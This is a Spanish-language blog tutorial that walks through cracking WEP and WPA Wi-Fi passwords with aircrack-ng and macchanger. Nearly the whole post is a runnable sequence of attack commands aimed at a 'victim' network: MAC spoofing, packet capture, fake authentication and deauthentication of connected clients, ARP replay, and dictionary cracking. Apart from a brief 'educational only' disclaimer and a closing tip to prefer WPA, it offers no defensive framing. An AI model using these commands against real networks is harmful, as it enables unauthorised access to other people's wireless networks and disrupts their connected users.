Este es el primer post de hacking de Apuntux, y espero que les sirva de utilidad. Recuerda que este tutorial está hecho únicamente para fines educativos y usa el programa bajo tu propia responsabilidad. El tutorial está hecho con Ubuntu 10.04, aunque la suite aircrack está disponible en versiones anteriores. Antes de nada, necesitarás lo siguiente:
- Diccionario (no es uno cualquiera, descarga uno de AQUÍ) El diccionario sólo se utilizará para crackear WPA.
- Un cliente conectado.
Una vez que hemos visto los requisitos podremos empezar:
Antes de nada, instalamos la suite Aircrack:
sudo apt-get install aircrack-ng
Y luego Macchanger:
sudo apt-get install macchanger
Ahora nos tenemos que asegurar de que no estemos conectados a ninguna red inalámbrica.
Ahora viene una parte muy importante, ya que si no puedes activar modo monitor en tu tarjeta de red no podrás crackear.
sudo airmon-ng start wlan0
Vemos que nos sale que se activó en mon0, asi que trabajaremos con mon0.
Damos de baja mon0.
sudo ifconfig mon0 down
Cambiamos la dirección MAC de mon0 por 00:11:22:33:44:55:
sudo macchanger -m 00:11:22:33:44:55 mon0
Damos de alta mon0:
sudo ifconfig mon0 up
Ahora escaneamos las redes disponibles, y encontraremos a nuestra víctima:
sudo airodump-ng mon0
Detenemos la escaneada pulsando Control+C
Ahora ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima:
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red, cambiando los datos de los corchetes por los de nuestra victima :
PARA WEP:
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA:
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0
Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima.
PARA WEP:
sudo aireplay-ng -2 -p 0841 -c FF:F:F:F:F:F -b [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA:
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
PARA WEP:
Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima.
sudo aircrack-ng -z [nombre red]*.cap
Esperamos a que descrifre la clave y cuando esté lista vuelves a activar la red e ingresas la clave.
Y para acabar este tutorial te doy un consejo: si tu router admite cambio de tipo de clave, configúrala en WPA, ya que éstas son más difíciles de crackear y la gente que quiera robar una casi siempre opta por las WEP.